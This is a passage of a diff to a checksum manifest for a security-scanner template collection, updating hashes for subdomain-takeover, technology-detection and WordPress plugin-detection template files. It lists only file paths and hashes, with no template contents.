+http/takeovers/hubspot-takeover.yaml:2cb5b27661d783d4848a66e5eafc49002a2fc45a +http/takeovers/intercom-takeover.yaml:a91cf0c8960b2efb27c5a148e53e2ac337294064 +http/takeovers/jazzhr-takeover.yaml:46b614d245bde97235eac386e8d5c038e51e9567 +http/takeovers/jetbrains-takeover.yaml:523bb78b5767d47693f76be2b0c22af8cfe83b30 +http/takeovers/kinsta-takeover.yaml:027229d51435b4b9f0f566f6eb559d978ba60ae0 +http/takeovers/launchrock-takeover.yaml:6865c4ad140f46a92ee617b51f84ed9cad16a877 +http/takeovers/leadpages-takeover.yaml:66b5af4cc70cfe1d5613c8d55e08264bf5b73bb6 +http/takeovers/lemlist-takeover.yaml:e1d289890e3ba3032a6a1ff8cb50adf9005b54d1 +http/takeovers/mashery-takeover.yaml:cbc6ec604d944871e88a15ddc73e0c8cdd6fd156 +http/takeovers/meteor-takeover.yaml:47e0e92384caaf652dbef90222f20f60873b2b41 +http/takeovers/netlify-takeover.yaml:082226555c7ac89b818262145f4bed3fa3520e24 +http/takeovers/ngrok-takeover.yaml:e44448929ae32505c8e84346280111c88fc0499e +http/takeovers/pagewiz-takeover.yaml:bb75d2bac7bcfcdfda5a8350dcad82d2c468520e +http/takeovers/pantheon-takeover.yaml:549ceeff4d41c64fdfed4eeabd686e440bd44eee +http/takeovers/pingdom-takeover.yaml:0afa0c16b924e6838e268f1a6cdfb5287fea2070 +http/takeovers/proposify-takeover.yaml:2a9e264375aad1f2c17d9ed3b0f7e344b1da4bc1 +http/takeovers/readme-takeover.yaml:bcfbaed8bff8c490e33c37f00748017239cdee99 +http/takeovers/readthedocs-takeover.yaml:bb36b99c930b8e29047585246322c46830267c54 +http/takeovers/shopify-takeover.yaml:d719af6e7e6584459751f8f648018c96d8e6800b +http/takeovers/short-io.yaml:413f150ee49d2f58f0ee92772f0def398f4e8704 +http/takeovers/simplebooklet-takeover.yaml:59f54fbe267936bc27f1f130c9c407743f2be5e8 +http/takeovers/smartjob-takeover.yaml:d794d90527377aa5c20078eebbaa5c1c35409d01 +http/takeovers/smugmug-takeover.yaml:942f32734a84a6d5d356b9c888ad38bfbec8134f +http/takeovers/softr-takeover.yaml:5853b1ff7b6e1dd30ee348598a388454c19b9e1b +http/takeovers/sprintful-takeover.yaml:7fcf206b524696cce6c189d9de214c9eb35218d0 +http/takeovers/squadcast-takeover.yaml:548595467ee9c3cbf64f66af10425f754f8b87f8 +http/takeovers/strikingly-takeover.yaml:95b9362f7bd7d9453b13f5ee91efe64c6f7baffc +http/takeovers/surge-takeover.yaml:f7c2930aca6c101b2fcc50cc32b8794ee5e7a4dd +http/takeovers/surveygizmo-takeover.yaml:9d1ba4a5e5f915f809d445e8baa2a2efd172d068 +http/takeovers/surveysparrow-takeover.yaml:a8232aa3d4b2dc68d1f053b30b5ce96955a4a1d3 +http/takeovers/tave-takeover.yaml:96c5bf7152674b94d248a75f1aa9771ec1dcf0a7 +http/takeovers/teamwork-takeover.yaml:0807ebc6a7ef6483851ed60cdb0a1f13ce458fe6 +http/takeovers/tilda-takeover.yaml:81590f60bfe4609729dc35ca85f38399f3670de2 +http/takeovers/tumblr-takeover.yaml:916fdcf5c92ac0d0cc33e9c5baff3f19308944ee +http/takeovers/uberflip-takeover.yaml:6dc3a304c4f2f10094a359b2c976408182b2d798 +http/takeovers/uptime-takeover.yaml:6c1d668222f1e7361757a5b0ff56a5d818f2e1e6 +http/takeovers/uptimerobot-takeover.yaml:9e254d84f5c798888d8986e40bbd2f352d98c1d4 +http/takeovers/uservoice-takeover.yaml:b18d696b4555011e3eade6318f599ccc087f0dc1 +http/takeovers/vend-takeover.yaml:76193b9d28484345699d53927f7fbdf4be753c0e +http/takeovers/wishpond-takeover.yaml:66cffea97d5f6e9a549ba85fe88cb5b48e0a9a97 +http/takeovers/wix-takeover.yaml:f4226d72108a5cff0bcf108c3fff51f742efd28d +http/takeovers/wordpress-takeover.yaml:07d6c48bd330281740bd05e19373492ae3ff2818 +http/takeovers/worksites-takeover.yaml:472d9c05b8a7a445f31076dfc55484898396a9ed +http/takeovers/wufoo-takeover.yaml:c1c249c1e3c0063ec554758226124e79690f0203 +http/takeovers/zendesk-takeover.yaml:07d1b4e0c335df7286a7ded110889241922db44d http/technologies/4D-detect.yaml:4b948a54eb2718980daa15d0ce2aaf5ee1bf843b http/technologies/abyss-web-server.yaml:2fffb4cde6c7f55d76d6e75695407b177e97455f http/technologies/acontent-detect.yaml:3a895300f93df22d858994bf6851a82f9d38c7d9 @@ -7294,229 +7294,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:e067e357c472bd8ec5d358b251598f9aa35fb4be -http/technologies/wordpress/plugins/add-to-any.yaml:b69f9439b1a0a3c527a7aff84049be886f631610 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:6cc322fd7909a000e67bf6b755c2ee69ce269c78 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:e76e42d907d888004ffeb85977b15917dbefa28d -http/technologies/wordpress/plugins/akismet.yaml:80cbce87a24f12d67c6aeaca046591d591fa20e7 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:9d2fa2ad57e8bd5ed29aed75ef913fb67b53749d -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:9dde6cd42c728a1ba85166e75cfb6a41ebda5036 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:967b5c493671d6431bea5ce64fa85e526d3a889e -http/technologies/wordpress/plugins/amp.yaml:3b024081d4036d1f44c787e7d76b6ad5fe6e8d77 -http/technologies/wordpress/plugins/antispam-bee.yaml:45a2231f58335862c0f28704903e02fd136de9ee -http/technologies/wordpress/plugins/astra-sites.yaml:31e0f2e1e49ce856e2525961699b54d49bbbb3f6 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:011bca8d1bbfd85fdbf957e21ee4f3e9590366f5 -http/technologies/wordpress/plugins/backwpup.yaml:6727c2a8698b7a9abacf148e6023370b95738d03 -http/technologies/wordpress/plugins/better-search-replace.yaml:b213320b4c7551c9fdc20fb0ec8276bdfe73b825 -http/technologies/wordpress/plugins/better-wp-security.yaml:dbddbcb23eb0f325a44dd2c620e1e44e702a860a -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:7fc65d6bb56e0e15ee0f8ae901f89da2c3ae10f9 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:ec411ffaad447876c81d6268b20edeeb52fabd90 -http/technologies/wordpress/plugins/breeze.yaml:08e5903ee95ee4e37b7cd68e29a1332ae5f72b0e -http/technologies/wordpress/plugins/broken-link-checker.yaml:a949d9f0572f79d9d2d319679944cb2ad786042d -http/technologies/wordpress/plugins/chaty.yaml:542e90f1b7fece08e36a22b0b461da5b2cd7274e -http/technologies/wordpress/plugins/child-theme-configurator.yaml:622776761bcba08eb7ead68230a6c9763d764402 -http/technologies/wordpress/plugins/classic-editor.yaml:4f42421e13c28213aa4a8008fc81fe44f40ba8ce -http/technologies/wordpress/plugins/classic-widgets.yaml:795af82f32035f99feffea5a95aba3f844f0daf2 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:27fc0c8be3979dd1f7b7047d5bf91af338247ef9 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:ec1cc6201cc78a92a9c66aee4159cf1cd72ef488 -http/technologies/wordpress/plugins/coblocks.yaml:7d10ea3193d3dee8324a98e9728c2e25c65a5494 -http/technologies/wordpress/plugins/code-snippets.yaml:ce7943cb86341eaee00d53f475b1f942a42d4b87 -http/technologies/wordpress/plugins/coming-soon.yaml:3ce0c1bb23832957e8e8f964d3ad6e5950151852 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:ea250332ccbbac354434e1efd95f9f147731c136 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:758acb18b74f907e7ee56754755abc04a18ff30c -http/technologies/wordpress/plugins/contact-form-7.yaml:b07e236f34aa44ba7810ae602950680de4a304db -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:80e3cb76543739cdce870383697aff07bb96cd44 -http/technologies/wordpress/plugins/cookie-law-info.yaml:0abbfc009a114b0a626c7a7bce97ed2247a69621 -http/technologies/wordpress/plugins/cookie-notice.yaml:7c6746459b03670d1751039775012aeeb0ed308b -http/technologies/wordpress/plugins/copy-delete-posts.yaml:5b97e6c996389e29e1b918e92f64b32394e17758 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:2e88a6149051bbf0e451fe03c7bf0346d8a50cf6 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:d3c500c590201da0a6c6a7723a5aed5418562151 -http/technologies/wordpress/plugins/custom-css-js.yaml:f7b1e1d2bb01b68bc6bc408e04c17fbc89bf4c5f -http/technologies/wordpress/plugins/custom-fonts.yaml:1791fdc0db0656191cbd0e1ff8c4475852846853 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:55a82b971d2a705ad3701f4a05064416646d612d -http/technologies/wordpress/plugins/disable-comments.yaml:8aee5e367999ad05f8d5ab0cfa242524c9a0b097 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:bbf25077af86b9d381004debbdd18d5548a66c67 -http/technologies/wordpress/plugins/duplicate-page.yaml:5c5113abe34fa40a6f21cfbd25539cf6ecb028e8 -http/technologies/wordpress/plugins/duplicate-post.yaml:3267eb33a319548414cc2550aa3a7945e63adae4 -http/technologies/wordpress/plugins/duplicator.yaml:2b4a61b86286eb244ce3fb77a3fb6de8d430f3e0 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:090d0d5a3b11c991cbefb7429d6b2b2a46cbeb60 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:63c2989eeac211b0dc91a2da72a09bfa26f032b3 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:9aaadbc157a942a10440785cbd6d8aa80bc25e39 -http/technologies/wordpress/plugins/elementor.yaml:2e4d10b4ff08d6ea5964f3ac1a8195c9744d9591 -http/technologies/wordpress/plugins/elementskit-lite.yaml:cca1c074b864f3d5c94937bd43e828c774e0c97d -http/technologies/wordpress/plugins/enable-media-replace.yaml:5fdb5d89bec6fd068934a30f0b8b1cee8c8f163a -http/technologies/wordpress/plugins/envato-elements.yaml:985f74fa1b59669fa595f9f5663e3738cbb1ae3a -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:9775303cf422471ea46f4a569a569a7fcfff6e38 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:7faabc428c83601a48b6b45196338f773cdb68fe -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:e4bfa703f615c586bf15b3ab637e6016191363f4 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:513731fe4aabb54658fd146b2534217bcb256108 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:8f27707106dfb61ed0c73d7ac4393fcaa010605e -http/technologies/wordpress/plugins/flamingo.yaml:4499ebd1420050bc4d86aebe99c083028ce3bc28 -http/technologies/wordpress/plugins/fluentform.yaml:53952e72dc35c8feb9f8739808894ed882fb019c -http/technologies/wordpress/plugins/font-awesome.yaml:63b6d44b534c9fd8dee1ea81ffd716c987bc2b6e -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:0b3a0d27e272c6950deff5f49e17c6814f987712 -http/technologies/wordpress/plugins/formidable.yaml:f06b9f12a7850db57e5f57dda4296811c299925c -http/technologies/wordpress/plugins/forminator.yaml:facf0e8bbc796322a08c63bf938c26ca10246efe -http/technologies/wordpress/plugins/ga-google-analytics.yaml:83978ec2f91546a6663a4c88c15179f3372a583b -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:3589c93816f9e05d3cfca2408e656406fc4062b0 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:d2a19ad3879e176c08dc68a02d7e26d6392b69b7 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:7ac55fe9ac13afb9ecff205149a061941b22576f -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4f7d3120e2bfe5555155b8e78031b84cc37040e7 -http/technologies/wordpress/plugins/google-site-kit.yaml:439dd6de9510c909a8c102c353329bc8f863c585 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:b26c751299867caba9d4aae857a11c25799f6520 -http/technologies/wordpress/plugins/gtranslate.yaml:8fd011f2396b29323896f16754aa504b1f036d02 -http/technologies/wordpress/plugins/gutenberg.yaml:a32a81de0d8a8abc1646c4dc48dd3d6656aa09c7 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:e9e741f7d54c6d3f48e7d272e3b4b0493034a582 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:73cef6de60def66b42aebcdc50021330113124c2 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:91f4c5a51b2b2cabf98932be7bceb56cffd196b6 -http/technologies/wordpress/plugins/header-footer.yaml:75e75d72e59f586249e99dbeb2a7b3899bbf9be9 -http/technologies/wordpress/plugins/health-check.yaml:3c2200b1aa0483543519be6ecbd0e1b1072a672a -http/technologies/wordpress/plugins/hello-dolly.yaml:6a9a2d558d6232fcfdee2745738226ea146c840f -http/technologies/wordpress/plugins/host-webfonts-local.yaml:8dc283cfe802277ece271f0b142d3eeb5c2466b6 -http/technologies/wordpress/plugins/hostinger.yaml:0c5bb65651142a15cb88dd192d52cd8bf3ced63c -http/technologies/wordpress/plugins/image-optimization.yaml:3ab3391345ecd3c57560839dd7aa453f91d614d0 -http/technologies/wordpress/plugins/imagify.yaml:8a5fc3096f4a8ecf0b8ee1eed59a2f91acdb38c8 -http/technologies/wordpress/plugins/imsanity.yaml:36c4a5dadefa9f97c6a3579fba41e1db148156bc -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:27558fa16920eeff4156998e6a743831ea26cbd6 -http/technologies/wordpress/plugins/instagram-feed.yaml:65e134aee3e82e8c36091b70f388bf9854aef1a0 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f49fe8fb33db7685b662c46c78ef6658d7092ea +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:0063727e2c7ac5322fc551cd700671f917c60304 -http/technologies/wordpress/plugins/jetpack.yaml:bb140f10c1592047a3b8ec5a2a567d6576e2006e -http/technologies/wordpress/plugins/kadence-blocks.yaml:2c5f54e4bd0aecaff7e467e41e6d4c8176a2956e -http/technologies/wordpress/plugins/kirki.yaml:fbe3fc3cdf00a13efabddc058b14d2891bda2d10 -http/technologies/wordpress/plugins/leadin.yaml:dc4b649805d1aaa5970750a50c0947bc93213063 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:111340df8784d87e08b167a86660e38ef533929f -http/technologies/wordpress/plugins/limit-login-attempts.yaml:69686d96fbd74122fe5051c337fd20ee19e21d30 -http/technologies/wordpress/plugins/litespeed-cache.yaml:27102347051d8a76190798320f3c5a8db6d974e7 -http/technologies/wordpress/plugins/loco-translate.yaml:d001ca1c5c7b9cd438bfb6c689c8c7d5a03ba49f -http/technologies/wordpress/plugins/loginizer.yaml:71c3c9002d23043b66f0ea9ebd1966113b67b97c +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:b1a2ac64ed191ad08002b7df29594e179c4da4bd -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:6f80ee60970fac6a5d3637ca02deac9ad6196fe2 -http/technologies/wordpress/plugins/mailpoet.yaml:892e52925c65450f3956d6a94cfc4ad8cad28d0b -http/technologies/wordpress/plugins/maintenance.yaml:7266d7246980628ac6a691674f1863a9a09f685a -http/technologies/wordpress/plugins/mainwp-child.yaml:084749769643249871a4dea287bfc1181e611e9a -http/technologies/wordpress/plugins/malcare-security.yaml:eb45bf9ddea2c84153eb42ea5056516470eae0b6 -http/technologies/wordpress/plugins/megamenu.yaml:53abfe4abb3a3546a9e80805536359465831522e -http/technologies/wordpress/plugins/members.yaml:eb9aa70ebef58ae731c3fbfcfce4644825bcf054 -http/technologies/wordpress/plugins/meta-box.yaml:2870a3b9bc2c19c1a76159e4447fda8d1ab34199 -http/technologies/wordpress/plugins/metform.yaml:aaf8cb7ce7440ced7f4860cb611337228353081e -http/technologies/wordpress/plugins/ml-slider.yaml:f17578bd39a2b905613db1f9d7002993215a986d -http/technologies/wordpress/plugins/newsletter.yaml:81fc40343e5556373e9153fb6f8382d04d1f008e -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:04127e2becaa6d815f286607afbced988b838234 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:3fa8767f8375a91ed9c56f51251fa055e587258a -http/technologies/wordpress/plugins/ninja-forms.yaml:7d2c5e18e6097dd9142e815dd8f5c36b54a818ed -http/technologies/wordpress/plugins/ocean-extra.yaml:101659ab81f5027e69b9496d49258111df592e0a -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:586bdcb217992655954d142c66c76c39eb3c51b9 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:bd8ea8a0723bd91b6b218f5bb082a62038c5a46d -http/technologies/wordpress/plugins/optinmonster.yaml:592de23a60bd950835dc547aa427570de4451087 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d24dc77a7d07390ff00d05d679a7d9d051ccfa9 -http/technologies/wordpress/plugins/password-protected.yaml:c09cc08d25ffec19d9bddb80dcaca126cd8214f1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:7dc6dccf029f556d8024e86d7f983b7c970873eb +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 